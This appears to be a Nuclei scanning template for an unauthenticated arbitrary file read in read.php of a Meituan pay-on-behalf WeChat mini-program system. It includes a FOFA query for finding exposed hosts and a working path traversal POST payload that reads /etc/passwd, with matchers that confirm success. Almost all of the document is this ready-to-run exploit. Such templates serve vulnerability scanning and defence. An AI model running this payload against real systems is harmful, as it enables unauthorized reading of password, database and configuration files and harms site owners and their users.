id: meituan-read_php-File-reading

info:
  tags: meituan-read_php-File-reading
  name: 美团代付微信小程序系统 read.php 任意文件读取漏洞
  author: xc
  severity: high
  description: |-
    fofa: body="/h5/static/js/chunk-vendors.js"
    美团代付微信小程序系统 read.php 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。


http:
  - raw:
      - |
        POST /static/ueditor22/_test/tools/br/read.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        Content-Type: application/x-www-form-urlencoded

        name=../../../../../../../../../etc/passwd
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'root:'
          - '/bin/bash'
        condition: and
      - type: status
        status: 
          - 200

